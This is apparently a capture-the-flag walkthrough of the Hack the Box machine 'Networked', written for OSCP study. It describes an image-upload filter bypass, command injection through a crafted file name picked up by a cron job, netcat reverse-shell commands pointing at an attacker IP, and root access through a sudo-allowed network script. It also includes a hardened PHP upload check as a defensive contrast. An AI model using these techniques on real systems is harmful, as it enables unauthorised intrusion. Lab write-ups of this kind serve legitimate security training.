OSCP PREP BOX 7: HtB Networked
On to box #7! Moving right along. Today we'll be taking on Networked, which is an easy box on Hack the Box. To start off, we'll run our default nmap scan, which shows the following results:
Not a whole lot of open ports, and we see some older versions of SSH and Apache running, which are interesting, but I'll hold off on that for now.
Taking a look at the web page, we can see it presents as a very simple text-only page. When we poke at the page source, though, we can see comments suggesting there's some unlinked content.
Let's run gobuster to see what we can enumerate:
When we navigate over to /backup, we can see it has directory listing enabled, and we can download a .tar file called backup.tar. I find it's cleaner to view the .tar file in a file explorer than on the command line. When we open it, we see this is a backup of the webserver! This is great. Now we see a bunch of other pages ending in .php that our initial directory brute force didn't find. If we read over the upload.php script, we can see that it applies some upload filters and that it writes files to the /uploads directory.
Let's check out upload.php.
From the upload.php script we see that the file name needs to contain .jpg. This does seem to be a whitelist, so we may have trouble uploading a PHP shell. I started testing to see whether a double extension would bypass it. It is important to send the request through Burp to check for content filters as well. There could also be some blacklists in effect, so we're going to test that as well.
The biggest thing here is file size. As I began testing, I realized that the upload.php script ONLY allows image files smaller than 60000 bytes. We then have to pay attention to naming conventions. We can see in the PHP script that it uses $_SERVER['REMOTE_ADDR'] to get our IP address, then replaces the periods with underscores. The file extension is taken from the original file's extension, so our file becomes (for example) 10_10_10_10.jpeg.
So now our goal becomes filter bypass. We know we have to include .jpg in the extension and keep the file size under 60000 bytes.
I first tried just getting RCE, which worked by putting a PHP code-execution snippet inside my image file and giving it a .php.jpg extension.
I had to prepend a GIF8 magic header to satisfy the MIME check, but it worked! Shell acquired.
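For contrast, here is what a stricter version of that upload check could look like. This is an added example, not the box's own upload.php; the form field name, upload path and size limit are assumptions.

```php
<?php
// Added example, not the box's upload.php. The walkthrough describes three weak
// checks: the name only has to *contain* ".jpg", the body only has to start with
// an image magic such as "GIF8", and the stored name keeps the client-supplied
// extension. Each of those is tightened below.

// Exact final extension => MIME type that finfo must report for the bytes.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];
const MAX_BYTES = 60000; // same limit the walkthrough mentions (assumed)

// Returns the extension to store the file under, or null to reject it.
function check_image_upload(string $origName, string $tmpPath, int $size): ?string {
    if ($size <= 0 || $size > MAX_BYTES) {
        return null;
    }
    // Only the LAST extension counts, so "shell.php.jpg" is treated as "jpg";
    // a substring test like strpos($name, '.jpg') is what the double extension beat.
    $ext = strtolower(pathinfo($origName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;
    }
    // Magic-bytes check via finfo, then require that the bytes parse as an image
    // of the claimed type. Both only inspect headers, so they are sanity checks;
    // the server-chosen name and a no-execute upload directory do the real work.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== ALLOWED[$ext]) {
        return null;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== ALLOWED[$ext]) {
        return null;
    }
    return $ext === 'jpeg' ? 'jpg' : $ext;
}

// Usage: field name "myFile" and destination directory are assumptions; the
// directory should have PHP execution disabled (e.g. "php_flag engine off").
$f = $_FILES['myFile'] ?? null;
if ($f === null || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    http_response_code(400); exit('upload failed');
}
$ext = check_image_upload($f['name'], $f['tmp_name'], (int)$f['size']);
if ($ext === null) {
    http_response_code(400); exit('rejected');
}
// Random server-chosen name, not REMOTE_ADDR plus whatever extension the client sent.
$dest = '/var/www/html/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($f['tmp_name'], $dest)) { http_response_code(500); exit('store failed'); }
```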
Okay, so as we poke around in the file system, we can see that there's a cronjob being run by the user guly. Looking at its source code, we have a few potential vectors for manipulating the cron job. In essence, the script goes through all the files in the uploads directory, looks for extensions that are considered "suspicious," deletes them, and uses the file name to send an email to guly. So, what if we created a file with a name that executes a shell command when it gets emailed? It took me a while to play around with this. I initially attempted to create a file called: shell.php; nc -e /bin/bash 10.10.14.9 9001. But I couldn't create the file because of the forward slashes in /bin/bash. Annoyingly, the cronjob runs every 3 minutes (*/3 * * * *), so it takes a bit of waiting around to test.
It took A LOT of testing, and I kept getting hung up on slashes in the file name. I ended up researching and finding out that netcat lets you execute commands without having to spell out /bin/bash: you can run nc -c bash <LHOST> <LPORT>. I was so close with my initial netcat -e argument and went down hours of rabbit holes. Classic. I then further shot myself in the foot by executing the cronjob myself and getting another shell as Apache. Genius. Anyways, we get our shell!
From here, we very quickly run sudo -l to check what the guly user can run as root, and we see guly can run a script called changename.sh.
When we take a look at the script, we can see that it sets up a network interface and accepts user input to do so. I tried using -h with the script to see if it accepted any parameters, but it did not. I tried messing around aimlessly with entering /bin/bash for all the parameters but didn't have any luck with that. I then took to Google, searched for network script privilege escalation, and came across this post on vulmon (https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f).
So essentially, if we add a space, everything after that space will be executed as root. Pretty easy.
I just added a space after one of the parameters and entered "bash".
Root obtained!